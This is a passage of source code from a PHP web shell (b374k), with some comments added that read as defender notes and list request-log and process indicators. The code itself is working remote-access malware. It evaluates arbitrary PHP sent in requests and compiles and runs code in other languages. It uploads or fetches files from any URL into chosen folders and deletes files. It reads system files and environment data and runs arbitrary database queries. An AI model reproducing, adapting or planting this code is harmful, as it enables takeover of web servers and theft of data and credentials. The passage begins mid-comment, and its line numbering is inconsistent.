// and exits. $font is not assigned anywhere in the visible part of the file - confirm
// whether it is defined elsewhere.
if(isset($_REQUEST['favicon'])){
    $data = gzinflate(base64_decode($favicon));
    header("Content-type: image/png");
    header("Cache-control: public");
    echo $data;
    exit;
}
if(isset($_REQUEST['font'])){
    $data = gzinflate(base64_decode($font));
    header("Content-type: application/font-woff");
    header("Cache-control: public");
    echo $data;
    exit;
}
544
545if($s_auth){
546 // server software
547 $s_software = getenv("SERVER_SOFTWARE");
548 // uname -a
549 $s_system = php_uname();
550 // check os
551 $s_win = (strtolower(substr($s_system,0,3)) == "win")? true : false;
552 // change working directory
553 if(isset($_REQUEST['d'])){
554 $dd = ss($_REQUEST['d']);
555 if(is_dir($dd)){
556 chdir($dd);
557 $cwd = cp($dd);
558 }
559 }
560 else $cwd = cp(getcwd());
561 // get path and all drives available
562 $letters = '';
563 if(!$s_win){
564 if(!$s_user = rp(exe("whoami"))) $s_user = "";
565 if(!$s_id = rp(exe("id"))) $s_id = "";
566 }
567 else {
568 $s_user = get_current_user();
569 $s_id = $s_user;
570 // find drive letters
571 $v = explode("\\",$cwd);
572 $v = $v[0];
573 foreach (range("A","Z") as $letter){
574 $bool = (is_dir($letter.":\\") && is_readable($letter.":\\"));
575 if ($bool){
576 $letters .= "<a href=\"?d=".$letter.":\\\">[ ";
577 if ($letter.":" != $v) {$letters .= $letter;}
578 else {$letters .= "<span style=\"color:#fff;\">".$letter."</span>";}
579 $letters .= " ]</a> ";
580 }
581 }
582 }
583 // prompt style..
584 $s_prompt = $s_user." >";
585
586 // check for posix
587 $s_posix = (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))? true : false;
588
589 // server ip
590 $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
591 // your ip ;-)
592 $s_my_ip = $_SERVER['REMOTE_ADDR'];
593
594
595 // sorttable.js
596 if(isset($_REQUEST['sorttable'])){
597 $data = gzinflate(base64_decode($sortable_js));
598 header("Content-type: text/javascript");
599 header("Cache-control: public");
600 echo $data;
601 exit;
602 }
603 if(!empty($_REQUEST['dltype']) && !empty($_REQUEST['dlpath'])){
604 $dltype = urldecode(ss($_REQUEST['dltype']));
605 $dlpath = urldecode(ss($_REQUEST['dlpath']));
606
607 $dlname = basename($dlpath);
608 if($dlpath==".") $dlname=basename($cwd);
609 elseif($dlpath==".."){
610 chdir("..");
611 $dlname=basename(getcwd());
612 chdir($cwd);
613 }
614 $tmpdir = get_writabledir();
615 $dlarchive = $tmpdir.$dlname;
616 $dlthis = "";
617 if($dltype=="ziparchive"){
618 $dlarchive .= ".zip";
619 if(zip($dlpath,$dlarchive)){
620 $dlthis = $dlarchive;
621 }
622 }
623 elseif($dltype=="tar"){
624 $dlarchive .= ".tar";
625 $dlarchive = str_replace('\\', '/', $dlarchive);
626 exe("tar cf ".$dlarchive." ".$dlpath);
627 $dlthis = $dlarchive;
628 }
629 elseif($dltype=="targz"){
630 $dlarchive .= ".tar.gz";
631 $dlarchive = str_replace('\\', '/', $dlarchive);
632 exe("tar czf ".$dlarchive." ".$dlpath);
633 $dlthis = $dlarchive;
634 }
635 elseif($dltype=="raw"){
636 if(is_file($dlpath)) $dlthis = $dlpath;
637 }
638
639
640 if(is_file($dlthis)){
641 header("Content-Type: application/octet-stream");
642 header('Content-Transfer-Encoding: binary');
643 header("Content-length: ".filesize($dlthis));
644 header("Content-disposition: attachment; filename=\"".basename($dlthis)."\";");
645 $file = @fopen($dlthis,"rb");
646 while(!feof($file)){
647 print(@fread($file, 1024*8));
648 ob_flush();
649 flush();
650 }
651 fclose($file);
652
653 if($dltype!="raw"){
654 rename($dlthis,$dlthis."del");
655 unlink($dlthis."del");
656 }
657 exit;
658 }
659 }
660 // view image specified by ?img=<file>
661 if(isset($_REQUEST['img'])){
662 ob_clean();
663 $d = ss($_REQUEST['d']);
664 $f = ss($_REQUEST['img']);
665 $inf = getimagesize($d.$f);
666 $ext = explode($f,".");
667 $ext = $ext[count($ext)-1];
668 header("Content-type: ".$inf["mime"]);
669 header("Cache-control: public");
670 header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
671 header("Cache-control: max-age=".(60*60*24*7));
672 readfile($d.$f);
673 exit;
674 }
675 // rename file or folder
676 if(isset($_REQUEST['rename']) && isset($_REQUEST['oldname']) && isset($_REQUEST['newname'])){
677 $old = ss($_REQUEST['oldname']);
678 $new = ss($_REQUEST['newname']);
679 if(rename($cwd.$old,$cwd.$new)) $dirmsg = "File ".$old." renamed to ".$new;
680 else $dirmsg = "Unable to rename file ".$old." to ".$new;
681 $fnew = $cwd.$new;
682 }
683 // delete file
684 if(!empty($_REQUEST['delete'])){
685 $f = ss($_REQUEST['delete']);
686 if(is_file($f)){
687 if(unlink($f)) $dirmsg = "File removed : ".$f;
688 else $dirmsg = "Unable to remove file ".$f;
689 }
690 else $dirmsg = "Unable to remove file ".$f;
691 } // delete dir
692 elseif(!empty($_REQUEST['rmdir'])){
693 $f = ss(rtrim(ss($_REQUEST['rmdir'],DIRECTORY_SEPARATOR)));
694 if(is_dir($f)){
695 rmdirs($f);
696 if(is_dir($f)) $dirmsg = "Unable to remove directory ".$f;
697 else $dirmsg = "Directory removed : ".$f;
698 }
699 else $dirmsg = "Unable to remove directory ".$f;
700 } // create dir
701 elseif(!empty($_REQUEST['mkdir'])){
702 $f = ss($cwd.ss($_REQUEST['mkdir']));
703 if(!is_dir($f)){
704 mkdir($f);
705 if(is_dir($f)) $dirmsg = "Directory created ".$f;
706 else $dirmsg = "Unable to create directory ".$f;
707 }
708 else $dirmsg = "Directory already exists ".$f;
709 }
710 // box result
711 $s_result = "";
712 // php eval() function
713 if(isset($_REQUEST['eval'])){
714 $code = "";
715 $lang = "php";
716 // access to compiler/interpreter
717
718 $s_python = check_access("python");
719 $s_perl = check_access("perl");
720 $s_ruby = check_access("ruby");
721 $s_gcc = check_access("gcc");
722 $s_java = check_access("java");
723
724 if(isset($_REQUEST['evalcode'])){
725 $code = ss($_REQUEST['evalcode']);
726 $tmpdir = get_writabledir();
727 if(isset($_REQUEST['lang'])){
728 $lang = $_REQUEST['lang'];
729 }
730
731 if(strtolower($lang)=='php'){
732 ob_start();
733 eval($code);
734 $res = ob_get_contents();
735 ob_end_clean();
736 $code = $res;
737 }
738 elseif(strtolower($lang)=='python'||strtolower($lang)=='perl'||strtolower($lang)=='ruby'){
739 $rand = md5(time().rand(0,100));
740 $script = $tmpdir.$rand;
741 file_put_contents($script, $code);
742 if(is_file($script)){
743 $res = exe($lang." ".$script);
744 unlink($script);
745 }
746 $code = $res;
747 }
748 elseif(strtolower($lang)=='gcc'){
749 $script = md5(time().rand(0,100));
750 chdir($tmpdir);
751 file_put_contents($script.".c", $code);
752 if(is_file($script.".c")){
753 $scriptout = $s_win ? $script.".exe" : $script;
754 $res = exe("gcc ".$script.".c -o ".$scriptout);
755 if(is_file($scriptout)){
756 $res = $s_win ? exe($scriptout) : exe("chmod +x ".$scriptout." ; ./".$scriptout);
757 rename($scriptout, $scriptout."del");
758 unlink($scriptout."del");
759 }
760 unlink($script.".c");
761 }
762 $code = $res;
763 chdir($cwd);
764 }
765 elseif(strtolower($lang)=='java'){
766 if(preg_match("/class\ ([^{]+){/i",$code, $r)){
767 $classname = trim($r[1]);
768 $script = $classname;
769 }
770 else{
771 $rand = "b374k_".substr(md5(time().rand(0,100)),0,8);
772 $script = $rand;
773 $code = "class ".$rand." { ".$code . " } ";
774 }
775 chdir($tmpdir);
776 file_put_contents($script.".java", $code);
777 if(is_file($script.".java")){
778 $res = exe("javac ".$script.".java");
779 if(is_file($script.".class")){
780 $res .= exe("java ".$script);
781 unlink($script.".class");
782 }
783 unlink($script.".java");
784 }
785 chdir($pwd);
786 $code = $res;
787 }
788 }
789
790 $lang_available = "";
791 $lang_available .= "<option value=\"php\">php</option>";
792 $selected = "";
793 if($s_python){
794 $checked = ($lang == "python") ? "selected" : "";
795 $lang_available .= "<option value=\"python\" ".$checked.">python</option>";
796 }
797 if($s_perl){
798 $checked = ($lang == "perl") ? "selected" : "";
799 $lang_available .= "<option value=\"perl\" ".$checked.">perl</option>";
800 }
801 if($s_ruby){
802 $checked = ($lang == "ruby") ? "selected" : "";
803 $lang_available .= "<option value=\"ruby\" ".$checked.">ruby</option>";
804 }
805 if($s_gcc){
806 $checked = ($lang == "gcc") ? "selected" : "";
807 $lang_available .= "<option value=\"gcc\" ".$checked.">c</option>";
808 }
809 if($s_java){
810 $checked = ($lang == "java") ? "selected" : "";
811 $lang_available .= "<option value=\"java\" ".$checked.">java</option>";
812 }
813
814 $s_result .= "<form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\">
815 <textarea id=\"evalcode\" name=\"evalcode\" class=\"evalcode\">".htmlspecialchars($code)."</textarea>
816 <table><tr><td><input type=\"submit\" name=\"evalcodesubmit\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
817 </td><td><select name=\"lang\" class=\"inputzbut\" style=\"width:120px;height:30px;padding:4px;\">
818 ".$lang_available."
819 </select></td></tr>
820 </table>
821 <input type=\"hidden\" name=\"eval\" value=\"\" />
822 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
823 </form>
824 ";
825 } // upload !
// Upload handler of the shell, selected when the request carries an `upload` parameter.
// Two modes are visible: `uploadhd` stores a multipart file sent by the client, and
// `uploadurl` has the server fetch a URL through dlfile() (defined outside this excerpt).
// In both modes the destination folder and the file name come from request parameters,
// and no extension or content-type restriction is applied in this branch.
// Defender note: the multipart field `filepath` and the parameters `savefolder`,
// `savefilename`, `fileurl`, `savefolderurl` and `savefilenameurl`, posted to a single
// PHP file with `?upload`, are usable as request-log / WAF indicators. Files created
// under the web-server account shortly after such a request are the likely on-disk
// trace, so a file-integrity baseline of the web root helps scope what was dropped.
826 elseif(isset($_REQUEST['upload'])){
827 $s_result = " ";
828 $msg = "";
// Mode 1: file sent by the client in the multipart field `filepath`.
829 if(isset($_REQUEST['uploadhd'])){
// Default target name is the client-supplied file name.
830 $fn = $_FILES['filepath']['name'];
831 if(is_uploaded_file($_FILES['filepath']['tmp_name'])){
// ss() and cp() are defined outside this excerpt; presumably ss() strips request
// slashes and cp() normalises a path with a trailing separator (confirm there).
832 $p = cp(ss($_REQUEST['savefolder']));
// If the requested folder is not a directory, fall back to its parent.
833 if(!is_dir($p)) $p = cp(dirname($p));
834 if(isset($_REQUEST['savefilename']) && (trim($_REQUEST['savefilename'])!="")) $fn = ss($_REQUEST['savefilename']);
835 $tm = $_FILES['filepath']['tmp_name'];
836 $pi = cp($p).$fn;
837 $st = move_uploaded_file($tm,$pi);
// The stored path and the file name are written into the page without HTML escaping.
838 if($st) $msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=".$cwd."&view=".$pi."\">".$pi."</a></p>";
839 else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
840 }
841 else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
842 }
// Mode 2: the server itself retrieves `fileurl` and stores it locally, which shows up
// as an outbound request from the web server rather than as an inbound upload body.
843 elseif(isset($_REQUEST['uploadurl'])){
844 // function dlfile($url,$fpath){
845 $p = cp(ss($_REQUEST['savefolderurl']));
846 if(!is_dir($p)) $p = cp(dirname($p));
847 $fu = ss($_REQUEST['fileurl']);
// Default target name is the last path component of the URL.
848 $fn = basename($fu);
849 if(isset($_REQUEST['savefilenameurl']) && (trim($_REQUEST['savefilenameurl'])!="")) $fn = ss($_REQUEST['savefilenameurl']);
850 $fp = cp($p).$fn;
851 $st = dlfile($fu,$fp);
852 if($st) $msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=".$cwd."&view=".$fp."\">".$fp."</a></p>";
853 else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
854 }
855
// Result message first, then the two upload forms; both forms post back to this
// same script with `?upload`, and both pre-fill the target folder with $cwd.
856 $s_result .= $msg;
857 $s_result .= "
858 <form action=\"" . $_SERVER['PHP_SELF'] . "?upload\" method=\"post\" enctype=\"multipart/form-data\">
859 <div class=\"mybox\"><h2>Upload from computer</h2>
860 <table class=\"myboxtbl\">
861 <tr><td style=\"width:100px;\">File</td><td><input type=\"file\" name=\"filepath\" class=\"inputzbut\" style=\"width:400px;margin:0;\" />
862 </td></tr>
863 <tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolder\" value=\"".$cwd."\" /></td></tr>
864 <tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilename\" value=\"\" /></td></tr>
865 <tr><td> </td><td>
866 <input type=\"submit\" name=\"uploadhd\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
867 </td></tr>
868 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
869 </table>
870 </div>
871 </form>
872 <form action=\"" . $_SERVER['PHP_SELF'] . "?upload\" method=\"post\">
873 <div class=\"mybox\"><h2>Upload from internet</h2>
874 <table class=\"myboxtbl\">
875 <tr><td style=\"width:100px;\">File URL</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"fileurl\" value=\"\" />
876 </td></tr>
877 <tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolderurl\" value=\"".$cwd."\" /></td></tr>
878 <tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilenameurl\" value=\"\" /></td></tr>
879 <tr><td> </td><td>
880 <input type=\"submit\" name=\"uploadurl\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
881 </td></tr>
882 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
883 </table>
884 </div>
885 </form>
886 ";
887 } // show server information
// Host reconnaissance page, selected when the request carries an `info` parameter.
// It probes for interpreters and compilers through check_access(), runs their version
// commands through exe() (both defined outside this excerpt), reports whether a few
// sensitive files are readable, dumps /proc data on non-Windows hosts and embeds the
// phpinfo() sections.
// Defender note: a PHP worker spawning `python -V`, `perl -e`, `ruby -v`,
// `gcc --version` and `java -version` in quick succession is a host-level signal that
// process auditing can alert on; web-server accounts rarely need to start compilers
// or interpreters at all.
888 elseif(isset($_REQUEST['info'])){
889 // access to compiler/interpreter
890 $s_python = check_access("python");
891 $s_perl = check_access("perl");
892 $s_ruby = check_access("ruby");
893 $s_gcc = check_access("gcc");
894 $s_java = check_access("java");
895
896 $s_result = "";
897 // server misc info
898 $s_result .= "<p class=\"rs_result\" onclick=\"toggle('info_server')\">Server Info</p>";
899 $s_result .= "<div class=\"info\" id=\"info_server\"><table>";
900
// One table row per tool found; command output is inserted without HTML escaping.
901 $s_result .= "<tr><td>php</td><td>".phpversion()."</td></tr>";
902 if($s_python) $s_result .= "<tr><td>python</td><td>".exe("python -V")."</td></tr>";
903 if($s_perl) $s_result .= "<tr><td>perl</td><td>".exe("perl -e \"print \$]\"")."</td></tr>";
904 if($s_ruby) $s_result .= "<tr><td>ruby</td><td>".exe("ruby -v")."</td></tr>";
905 if($s_gcc){
906 $gcc_version = exe("gcc --version");
// Only the first line of the gcc banner is shown.
907 $gcc_ver = explode("\n",$gcc_version);
908 if(count($gcc_ver)>0) $gcc_ver = $gcc_ver[0];
909 $s_result .= "<tr><td>gcc</td><td>".$gcc_ver."</td></tr>";
910 }
911 if($s_java) $s_result .= "<tr><td>java</td><td>".str_replace("\n", ", ", exe("java -version"))."</td></tr>";
// Readability checks for account, OS-banner and SSH daemon configuration files; each
// hit links to the shell's `view` action. Requests carrying `view=/etc/passwd`,
// `view=/etc/issue` or `view=/etc/ssh/sshd_config` are therefore worth searching for
// in access logs.
912 if(is_file("/etc/passwd") && is_readable("/etc/passwd")) $s_result .= "<tr><td>/etc/passwd</td><td><a href=\"".$_SERVER['PHP_SELF']."?view=/etc/passwd\">/etc/passwd is readable</a></td></tr>";
913 if(is_file("/etc/issue") && is_readable("/etc/issue")) $s_result .= "<tr><td>/etc/issue</td><td><a href=\"".$_SERVER['PHP_SELF']."?view=/etc/issue\">/etc/issue is readable</a></td></tr>";
914 if(is_file("/etc/ssh/sshd_config") && is_readable("/etc/ssh/sshd_config")) $s_result .= "<tr><td>/etc/ssh/sshd_config</td><td><a href=\"".$_SERVER['PHP_SELF']."?view=/etc/ssh/sshd_config\">/etc/ssh/sshd_config is readable</a></td></tr>";
915
916 $s_result .= "</table></div>";
917
// $s_win is set outside this excerpt; the /proc reads below run only when it is false.
918 if(!$s_win){
919 // cpu info
// /proc/cpuinfo: records separated by blank lines, one table per record, and only
// lines that split into exactly two parts on ':' are shown.
920 if($i_buff=trim(file_get_contents("/proc/cpuinfo"))){
921 $s_result .= "<p class=\"rs_result\" onclick=\"toggle('info_cpu')\">CPU Info</p>";
922 $s_result .= "<div class=\"info\" id=\"info_cpu\">";
923 $i_buffs = explode("\n\n", $i_buff);
924 foreach($i_buffs as $i_buffss){
925 $i_buffss = trim($i_buffss);
926 if($i_buffss!=""){
927 $i_buffsss = explode("\n",$i_buffss);
928 $s_result .= "<table>";
929 foreach($i_buffsss as $i){
930 $i = trim($i);
931 if($i!=""){
932 $ii = explode(":",$i);
933 if(count($ii)==2) $s_result .= "<tr><td>".$ii[0]."</td><td>".$ii[1]."</td></tr>";
934 }
935 }
936 $s_result .= "</table>";
937 }
938 }
939 $s_result .= "</div>";
940 }
941 // mem info
// /proc/meminfo: same key:value rendering; an empty line starts a new table.
942 if($i_buff=trim(file_get_contents("/proc/meminfo"))){
943 $s_result .= "<p class=\"rs_result\" onclick=\"toggle('info_mem')\">Memory Info</p>";
944 $i_buffs = explode("\n",$i_buff);
945 $s_result .= "<div class=\"info\" id=\"info_mem\"><table>";
946 foreach($i_buffs as $i){
947 $i = trim($i);
948 if($i!=""){
949 $ii = explode(":",$i);
950 if(count($ii)==2) $s_result .= "<tr><td>".$ii[0]."</td><td>".$ii[1]."</td></tr>";
951 }
952 else $s_result .= "</table><table>";
953 }
954 $s_result .= "</table></div>";
955 }
956 // partition
// /proc/partitions: runs of spaces are collapsed, the text before the first blank
// line is used as the header row and the text after it as the data rows.
957 if($i_buff=trim(file_get_contents("/proc/partitions"))){
958 $i_buff = preg_replace("/\ +/"," ",$i_buff);
959 $s_result .= "<p class=\"rs_result\" onclick=\"toggle('info_part')\">Partitions Info</p>";
960 $s_result .= "<div class=\"info\" id=\"info_part\">";
961 $i_buffs = explode("\n\n", $i_buff);
962 $s_result .= "<table><tr>";
963 $i_head = explode(" ",$i_buffs[0]);
964 foreach($i_head as $h) $s_result .= "<th>".$h."</th>";
965 $s_result .= "</tr>";
966 $i_buffss = explode("\n", $i_buffs[1]);
967 foreach($i_buffss as $i_b){
968 $i_row = explode(" ",trim($i_b));
969 $s_result .= "<tr>";
970 foreach($i_row as $r) $s_result .= "<td style=\"text-align:center;\">".$r."</td>";
971 $s_result .= "</tr>";
972 }
973 $s_result .= "</table>";
974 $s_result .= "</div>";
975 }
976 }
// phpinfo() sections, keyed by display title. The values are PHP's INFO_* constants.
977 $phpinfo = array(
978 "PHP General" => INFO_GENERAL,
979 "PHP Configuration" => INFO_CONFIGURATION,
980 "PHP Modules" => INFO_MODULES,
981 "PHP Environment" => INFO_ENVIRONMENT,
982 "PHP Variables" => INFO_VARIABLES
983 );
984 foreach($phpinfo as $p=>$i){
985 $s_result .= "<p class=\"rs_result\" onclick=\"toggle('".$i."')\">".$p."</p>";
// Output buffering captures the phpinfo() page so that only its <body> is reused.
// The eval() argument is built from the hard-coded constant above, not from request
// data. The Environment and Variables sections can expose server-side secrets to
// whoever can reach this page.
986 ob_start();
987 eval("phpinfo(".$i.");");
988 $b = ob_get_contents();
989 ob_end_clean();
990 $a = strpos($b,"<body>")+6;
991 $z = strpos($b,"</body>");
992 $body = substr($b,$a,$z-$a);
// A space is added after ',' and ';', apparently so that long values can wrap.
993 $body = str_replace(",",", ",$body);
994 $body = str_replace(";","; ",$body);
995 $s_result .= "<div class=\"info\" id=\"".$i."\">".$body."</div>";
996 }
997 } // working with database
998 elseif(isset($_REQUEST['db'])){
// Setup for the shell's database client: every connection setting is read from request
// parameters (host defaults to "localhost", everything else to an empty string). ss()
// is defined outside this excerpt.
// Defender note: the parameter names `sqlhost`, `sqlport`, `sqluser`, `sqlpass`,
// `odbcdsn`, `odbcuser`, `odbcpass`, `pdodsn`, `pdouser`, `pdopass`, `sqlite_file` and
// `sqlcode`, posted to one PHP file with `?db`, are request-log indicators. If this
// file is found on a host, treat database credentials readable from the web root as
// exposed, and review database audit logs for logins from the web server.
999 // sqltype : mysql, mssql, oracle, pgsql, odbc, pdo
1000 $sqlhost = isset($_REQUEST['sqlhost'])? ss($_REQUEST['sqlhost']) : "localhost";
1001 $sqlport = isset($_REQUEST['sqlport'])? ss($_REQUEST['sqlport']) : "";
1002 $sqluser = isset($_REQUEST['sqluser'])? ss($_REQUEST['sqluser']) : "";
1003 $sqlpass = isset($_REQUEST['sqlpass'])? ss($_REQUEST['sqlpass']) : "";
1004 $odbcdsn = isset($_REQUEST['odbcdsn'])? ss($_REQUEST['odbcdsn']) : "";
1005 $odbcuser = isset($_REQUEST['odbcuser'])? ss($_REQUEST['odbcuser']) : "";
1006 $odbcpass = isset($_REQUEST['odbcpass'])? ss($_REQUEST['odbcpass']) : "";
1007 $pdodsn = isset($_REQUEST['pdodsn'])? ss($_REQUEST['pdodsn']) : "";
1008 $pdouser = isset($_REQUEST['pdouser'])? ss($_REQUEST['pdouser']) : "";
1009 $pdopass = isset($_REQUEST['pdopass'])? ss($_REQUEST['pdopass']) : "";
1010 $sqlite_file = isset($_REQUEST['sqlite_file'])? ss($_REQUEST['sqlite_file']) : "";
1011
// $sqls holds the SQL text shown in the form, $q_result the rendered query output.
1012 $sqls = "";
1013 $q_result = "";
// "host:port" is used only when a port was supplied.
1014 $hostandport = $sqlhost;
1015 if(trim($sqlport)!="") $hostandport = $sqlhost.":".$sqlport;
1016
// Query form template shared by the host/user/password drivers; `__sqlcode__` and
// `__sqltype__` are placeholders filled in later with str_replace(). The connection
// settings, including the password in clear text, are carried in hidden fields, so
// each query request repeats the database credentials in its POST body. Their values
// are inserted into the HTML without escaping.
1017 $sqlform_tpl = "<form action=\"" . $_SERVER['PHP_SELF'] . "?db\" method=\"post\">
1018 <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
1019 <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
1020 <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
1021 <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
1022 <input type=\"hidden\" name=\"d\" value=\"".$cwd."\" />
1023 <textarea id=\"sqlcode\" name=\"sqlcode\" class=\"evalcode\" style=\"height:10em;\">__sqlcode__</textarea>
1024 <p><input type=\"submit\" name=\"__sqltype__\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" />
1025 Separate multiple commands with a semicolon <span class=\"gaya\">[</span> ; <span class=\"gaya\">]</span></p>
1026 </form>";
1027
// MySQL path of the database client, taken when the request carries a `mysql`
// parameter and the connection succeeds. It relies on the legacy mysql_* extension,
// which was removed in PHP 7.
// Defender note: the statements come verbatim from the `sqlcode` request parameter, so
// they run with whatever privileges the supplied account has. The default statement
// shown when no `sqlcode` is sent, `SHOW databases;`, is a string worth searching for
// in database audit logs around the time of suspicious requests.
1028 if(isset($_REQUEST['mysql']) && ($con = mysql_connect($hostandport,$sqluser,$sqlpass))){
1029 if(isset($_REQUEST['sqlcode'])){
1030 $sqls = ss($_REQUEST['sqlcode']);
// Naive split on ';': each non-empty piece is sent as a separate statement.
1031 $querys = explode(";",$sqls);
1032
1033 foreach($querys as $query){
1034 if(trim($query) != ""){
1035 $hasil = mysql_query($query);
1036 if($hasil){
// The statement text is echoed into the page unescaped; column names and cell
// values below go through htmlspecialchars().
1037 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1038 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1039 <table class=\"explore\" style=\"width:99%;\"><tr>";
1040 for($i=0;$i<mysql_num_fields($hasil);$i++)
1041 $q_result .= "<th>".htmlspecialchars(mysql_field_name($hasil,$i))."</th>";
1042 $q_result .= "</tr>";
1043 while($rows=mysql_fetch_array($hasil)){
1044 $q_result .= "<tr>";
1045 for($j=0;$j<mysql_num_fields($hasil);$j++)
1046 {
// Empty cells are shown as a single space.
1047 if($rows[$j] == "") $dataz = " ";
1048 else $dataz = $rows[$j];
1049 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1050 }
1051 $q_result .= "</tr>";
1052 }
1053 $q_result .= "</table>";
1054 }
1055 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1056 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1057 }
1058 }
1059 }
1060 else $sqls = "SHOW databases;";
1061
// Fill the shared form template for this driver, then append the query output.
1062 $s_result .= str_replace("__sqltype__","mysql",str_replace("__sqlcode__", $sqls, $sqlform_tpl));
1063 $s_result .= "<div>".$q_result."</div>";
1064 if($con) mysql_close($con);
1065 }
1066 elseif(isset($_REQUEST['mssql']) && ($con = mssql_connect($hostandport,$sqluser,$sqlpass))){
1067 if(isset($_REQUEST['sqlcode'])){
1068 $sqls = ss($_REQUEST['sqlcode']);
1069 $querys = explode(";",$sqls);
1070
1071 foreach($querys as $query){
1072 if(trim($query) != ""){
1073 $hasil = mssql_query($query);
1074 if($hasil){
1075 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1076 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1077 <table class=\"explore\" style=\"width:99%;\"><tr>";
1078 for($i=0;$i<mssql_num_fields($hasil);$i++)
1079 $q_result .= "<th>".htmlspecialchars(mssql_field_name($hasil,$i))."</th>";
1080 $q_result .= "</tr>";
1081 while($rows=mssql_fetch_array($hasil)){
1082 $q_result .= "<tr>";
1083 for($j=0;$j<mssql_num_fields($hasil);$j++)
1084 {
1085 if($rows[$j] == "") $dataz = " ";
1086 else $dataz = $rows[$j];
1087 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1088 }
1089 $q_result .= "</tr>";
1090 }
1091 $q_result .= "</table>";
1092 }
1093 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1094 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1095 }
1096 }
1097 }
1098 else $sqls = "SELECT name FROM master..sysdatabases;";
1099
1100 $s_result .= str_replace("__sqltype__","mssql",str_replace("__sqlcode__", $sqls, $sqlform_tpl));
1101 $s_result .= "<div>".$q_result."</div>";
1102 if($con) mssql_close($con);
1103 }
1104 elseif(isset($_REQUEST['sqlsrv']) && ($con = sqlsrv_connect($hostandport,$sqluser,$sqlpass))){
1105 if(isset($_REQUEST['sqlcode'])){
1106 $sqls = ss($_REQUEST['sqlcode']);
1107 $querys = explode(";",$sqls);
1108
1109 foreach($querys as $query){
1110 if(trim($query) != ""){
1111 $hasil = sqlsrv_query($query);
1112 if($hasil){
1113 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1114 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1115 <table class=\"explore\" style=\"width:99%;\"><tr>";
1116 for($i=0;$i<sqlsrv_num_fields($hasil);$i++)
1117 $q_result .= "<th>".htmlspecialchars(sqlsrv_field_name($hasil,$i))."</th>";
1118 $q_result .= "</tr>";
1119 while($rows=sqlsrv_fetch_array($hasil)){
1120 $q_result .= "<tr>";
1121 for($j=0;$j<sqlsrv_num_fields($hasil);$j++)
1122 {
1123 if($rows[$j] == "") $dataz = " ";
1124 else $dataz = $rows[$j];
1125 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1126 }
1127 $q_result .= "</tr>";
1128 }
1129 $q_result .= "</table>";
1130 }
1131 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1132 <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
1133 }
1134 }
1135 }
1136 else $sqls = "SELECT name FROM master..sysdatabases;";
1137
1138 $s_result .= str_replace("__sqltype__","sqlsrv",str_replace("__sqlcode__", $sqls, $sqlform_tpl));
1139 $s_result .= "<div>".$q_result."</div>";
1140 if($con) sqlsrv_close($con);
1141 }
1142 elseif(isset($_REQUEST['oracle']) && ($con = oci_connect($sqluser,$sqlpass,$hostandport))){
1143 if(isset($_REQUEST['sqlcode'])){
1144 $sqls = ss($_REQUEST['sqlcode']);
1145 $querys = explode(";",$sqls);
1146
1147 foreach($querys as $query){
1148 if(trim($query) != ""){
1149 $st = oci_parse($con, $query);
1150 if(oci_execute($st)){
1151 $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
1152 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>
1153 <table class=\"explore\" style=\"width:99%;\"><tr>";
1154 for($i=1;$i<=oci_num_fields($st);$i++)
1155 $q_result .= "<th>".htmlspecialchars(oci_field_name($st,$i))."</th>";
1156
1157 $q_result .= "</tr>";
1158
1159 while($rows=oci_fetch_array($st)){
1160 $q_result .= "<tr>";
1161 for($j=0;$j<oci_num_fields($st);$j++)
1162 {
1163 if($rows[$j] == "") $dataz = " ";
1164 else $dataz = $rows[$j];
1165 $q_result .= "<td>".htmlspecialchars($dataz)."</td>";
1166 }
1167 $q_result .= "</tr>";
1168 }
1169 $q_result .= "</table>";
1170 }
1171 else $q_result .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
